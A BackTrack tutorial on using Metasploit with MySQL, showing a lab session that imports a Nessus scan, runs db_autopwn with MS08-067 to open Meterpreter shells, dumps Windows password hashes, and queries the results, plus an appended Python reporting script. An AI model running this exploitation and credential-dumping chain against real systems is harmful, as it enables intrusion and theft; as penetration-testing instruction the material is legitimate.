BackTrack

Metasploit with MySQL in BackTrack 4 r2

Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MySQL, but it was not an altogether seamless experience. Now, however, Metasploit and MySQL work together “out of the box”, so we thought it would be worth highlighting the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. Quite a number of additional database commands have also been added to Metasploit, and online documentation tends to be rather sparse when it comes to the less “glamorous” side of database management.

root@bt:~# msfconsole

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3

We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.

msf > db_driver mysql
[*] Using database driver mysql
msf > /etc/init.d/mysql start
[*] exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*]    Usage: db_connect <user:pass>@<host:port>/<database>
[*]       OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*]        db_connect user@metasploit3
[*]        db_connect user:pass@192.168.0.2/metasploit3
[*]        db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3

In order to have some hosts to use as targets, and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit will automatically detect the file type and import it for us.

msf > db_import /root/nessus_report_EDB.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus

After the successful import, our database should be populated with a number of hosts. Running db_hosts will query the database and allow us to customize the output.

msf > db_hosts -h
Usage: db_hosts [-h|--help] [-u|--up] [-a <addr1,addr2>] [-c <column1,column2>] [-o output-file ]

  -a <addr1,addr2>  Search for a list of addresses
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format

Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at

msf > db_hosts -c address,mac

Hosts
=====

address         mac
-------         ---
192.168.69.100  00:0C:29:DE:1A:00
192.168.69.105  00:0C:29:9A:FC:E0
192.168.69.110  00:0C:29:69:9C:44
192.168.69.130  00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141  00:0C:29:F3:40:70
192.168.69.142  00:0C:29:57:63:E2
192.168.69.143  00:0C:29:32:29:79
192.168.69.146
192.168.69.171  00:0C:29:EC:23:47
192.168.69.173  00:0C:29:45:7D:33
192.168.69.175  00:0C:29:BB:38:53
192.168.69.199  00:0C:29:58:09:DA
192.168.69.50

Far more interesting than IP and MAC addresses are the services running on our target systems, which is what db_services will show us.

msf > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a <addr1,addr2>] [-r <protocol>] [-p <port1,port2>] [-n <name1,name2>]

  -a <addr1,addr2>  Search for a list of addresses
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -n <name1,name2>  Search for a list of service names
  -p <port1,port2>  Search for a list of ports
  -r <protocol>     Only show [tcp|udp] services
  -u,--up           Only show services which are up

Available columns: created_at, info, name, port, proto, state, updated_at

msf > db_services -c name,port,proto

Services
========

name            port   proto  Host            Workspace
----            ----   -----  ----            ---------
192.168.69.100  123    udp    192.168.69.100  default
192.168.69.100  135    tcp    192.168.69.100  default
192.168.69.100  137    udp    192.168.69.100  default
192.168.69.100  139    tcp    192.168.69.100  default
192.168.69.100  445    tcp    192.168.69.100  default
192.168.69.100  3389   tcp    192.168.69.100  default
192.168.69.105  123    udp    192.168.69.105  default
...snip...

Most interesting of all is the list of vulnerabilities that are mapped to our specific targets as found in the vulnerability scan. The db_vulns command will list the vulnerabilities along with their corresponding reference numbers, if applicable.

msf > db_vulns
[*] Time: Sat Nov 20 20:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26920 refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26919 refs=CVE-1999-0505
...snip...

For the sake of brevity, we will just let db_autopwn exploit the low-hanging fruit for us and only run exploits with at least a “good” rating.

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -x -e -R good
[*] (1/30 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139...
[*] (2/30 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139...
...snip...
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 20 15:45:24 -0500 2010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 20 15:45:24 -0500 2010
[*] (30/30 [2 sessions]): Waiting on 2 launched modules to finish execution...
[*] (30/30 [2 sessions]): Waiting on 0 launched modules to finish execution...

In a short amount of time, Metasploit has delivered two Meterpreter sessions to us.

msf > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
--  ----                   -----------                            ----------
1   meterpreter x86/win32                                         192.168.69.140:54342 -> 192.168.69.105:34160
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ V-XPSP2-TEMPLAT  192.168.69.140:53895 -> 192.168.69.100:30423

Running db_exploited now will list not only the hosts that were exploited but also the port and the exploit that succeeded against each of them.

msf > db_exploited
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445 proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.

Post-exploitation is critical, and you can frequently make use of gathered credentials to penetrate deeper into a target network. Metasploit has the db_add_cred command, which allows you to insert credentials into the database as you come across them during your engagement.

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >

All of these database features are very powerful and exciting, but just as exciting is that your entire session is now available in MySQL.

root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use msf3;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_msf3              |
+-----------------------------+
| attachments                 |
| attachments_email_templates |
| campaigns                   |
| clients                     |
| creds                       |
| email_addresses             |
| email_templates             |
| events                      |
| exploited_hosts             |
| hosts                       |
| imported_creds              |
| loots                       |
| notes                       |
| project_members             |
| refs                        |
| report_templates            |
| reports                     |
| schema_migrations           |
| services                    |
| tasks                       |
| users                       |
| vulns                       |
| vulns_refs                  |
| web_forms                   |
| web_pages                   |
| web_sites                   |
| web_templates               |
| web_vulns                   |
| wmap_requests               |
| wmap_targets                |
| workspaces                  |
+-----------------------------+
31 rows in set (0.00 sec)

We can now perform queries to access all of the information gathered on exploited hosts, gathered credentials, and much more.

mysql> select * from exploited_hosts;
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| id | host_id | service_id | session_uuid | name                                | payload                              | created_at          | updated_at          |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
|  1 |      14 |        131 | oc5vd2zl     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
|  2 |      15 |        137 | qwtwtqfj     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| id | service_id | created_at          | updated_at          | user          | pass                                                                                   | active | proof | ptype    | source_id | source_type |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
|  1 |        131 | 2010-11-20 20:54:36 | 2010-11-20 20:54:36 | Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: |      1 | NULL  | password |      NULL | NULL        |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
1 rows in set (0.00 sec)

mysql>

At first glance, database integration may not seem that compelling, but it opens the door for the community to develop customized reporting applications on top of a database as widely used as MySQL, easing the post-penetration-test reporting burden.
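As an added example of the kind of reporting query the paragraph above has in mind (this is not code from the original post or from the Metasploit project), the script below joins exploited_hosts to hosts, services and creds to produce one row per compromised host with the exploit, payload and any stored credentials. It uses only the columns visible in the tables printed above, plus one assumption not shown on the page: that the services table carries a host_id column linking a service to its host. The SQL is standard enough to run unchanged on the msf3 MySQL database through any DB-API connection; here it runs against an in-memory SQLite stand-in seeded with constructed rows that mirror the output shown earlier.

```python
"""Added example, not part of the original BackTrack post.

build_report() runs a single SELECT against a Metasploit-style database and
returns one record per exploited host. constructed_msf3() is a SQLite
stand-in for the msf3 MySQL database, holding a minimal subset of the
Metasploit tables with constructed rows that mirror the post's output.
Assumption (not shown on the page): services has a host_id column.
"""
import sqlite3

# Standard SQL only (JOIN, LEFT JOIN, COUNT, GROUP_CONCAT) so the same statement
# runs on the real msf3 database in MySQL and on the SQLite stand-in below.
REPORT_SQL = """
SELECT h.address,
       s.port,
       s.proto,
       e.name               AS exploit,
       e.payload,
       COUNT(c.id)          AS cred_count,
       GROUP_CONCAT(c.user) AS cred_users
FROM exploited_hosts e
JOIN hosts    h ON h.id = e.host_id
JOIN services s ON s.id = e.service_id
LEFT JOIN creds c ON c.service_id = s.id AND c.active = 1
GROUP BY h.address, s.port, s.proto, e.name, e.payload
ORDER BY h.address
"""


def build_report(conn):
    """Run REPORT_SQL on a DB-API 2.0 connection; return a list of dicts."""
    cur = conn.cursor()
    cur.execute(REPORT_SQL)
    columns = [d[0] for d in cur.description]
    return [dict(zip(columns, row)) for row in cur.fetchall()]


def constructed_msf3():
    """In-memory SQLite database seeded with constructed rows mirroring the post."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE hosts (id INTEGER PRIMARY KEY, address TEXT, mac TEXT);
        CREATE TABLE services (id INTEGER PRIMARY KEY, host_id INTEGER,
                               port INTEGER, proto TEXT, name TEXT, state TEXT);
        CREATE TABLE exploited_hosts (id INTEGER PRIMARY KEY, host_id INTEGER,
                               service_id INTEGER, session_uuid TEXT,
                               name TEXT, payload TEXT);
        CREATE TABLE creds (id INTEGER PRIMARY KEY, service_id INTEGER,
                            user TEXT, pass TEXT, active INTEGER, ptype TEXT);
    """)
    conn.executemany("INSERT INTO hosts VALUES (?,?,?)", [
        (14, "192.168.69.105", "00:0C:29:9A:FC:E0"),
        (15, "192.168.69.100", "00:0C:29:DE:1A:00"),
        (16, "192.168.69.110", "00:0C:29:69:9C:44"),  # scanned but never exploited
    ])
    conn.executemany("INSERT INTO services VALUES (?,?,?,?,?,?)", [
        (131, 14, 445, "tcp", "smb", "open"),
        (137, 15, 445, "tcp", "smb", "open"),
        (140, 16, 445, "tcp", "smb", "open"),
    ])
    conn.executemany("INSERT INTO exploited_hosts VALUES (?,?,?,?,?,?)", [
        (1, 14, 131, "oc5vd2zl", "exploit/windows/smb/ms08_067_netapi",
         "payload/windows/meterpreter/bind_tcp"),
        (2, 15, 137, "qwtwtqfj", "exploit/windows/smb/ms08_067_netapi",
         "payload/windows/meterpreter/bind_tcp"),
    ])
    # One credential, stored the way db_add_cred stored it above (pass holds the
    # whole hashdump line); the hash values are placeholders here.
    conn.executemany("INSERT INTO creds VALUES (?,?,?,?,?,?)", [
        (1, 131, "Administrator", "Administrator:500:<lm hash>:<nt hash>:::", 1, "password"),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    for row in build_report(constructed_msf3()):
        print("{address}:{port}/{proto}  {exploit}  creds={cred_count} ({cred_users})".format(**row))
```

Against the real database you would replace constructed_msf3() with a MySQLdb connection to msf3 and pass it to build_report() unchanged; the host that was scanned but never exploited (192.168.69.110 in the constructed data) does not appear, and a host with no stored credentials shows a cred_count of 0 and a NULL cred_users.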

For further details on setting up and using the various databases in Metasploit, check out the Using the MSF Database section in Metasploit Unleashed.